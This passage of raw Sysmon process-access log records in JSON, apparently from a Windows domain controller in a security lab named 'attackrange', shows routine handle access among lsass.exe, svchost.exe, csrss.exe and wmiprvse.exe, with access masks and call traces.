06:49:03.053","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"588","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":998,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:03.053\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 588\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:03.053","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"588","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":999,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:03.053\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 588\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:03.053","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"588","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1000,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:03.053\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:03.053","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1001,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:03.053\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:03.053","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1002,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:03.068\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:03.068","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1003,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:03.068\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:03.068","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1004,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:03.068\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:03.068","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1005,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:03.084\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2420\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x101541\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+20fee|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+43f7|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+15538|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+1498a|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+146e6|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+140fe|C:\\Windows\\system32\\wbem\\wbemcore.dll+b920|C:\\Windows\\system32\\wbem\\wbemcore.dll+255ff|C:\\Windows\\system32\\wbem\\wbemcore.dll+24a9a|C:\\Windows\\system32\\wbem\\wbemcore.dll+2485e|C:\\Windows\\system32\\wbem\\wbemcore.dll+2685b|C:\\Windows\\system32\\wbem\\wbemcore.dll+22b78|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:03.084","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"2420","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x101541","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+20fee|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+43f7|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+15538|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+1498a|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+146e6|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+140fe|C:\\Windows\\system32\\wbem\\wbemcore.dll+b920|C:\\Windows\\system32\\wbem\\wbemcore.dll+255ff|C:\\Windows\\system32\\wbem\\wbemcore.dll+24a9a|C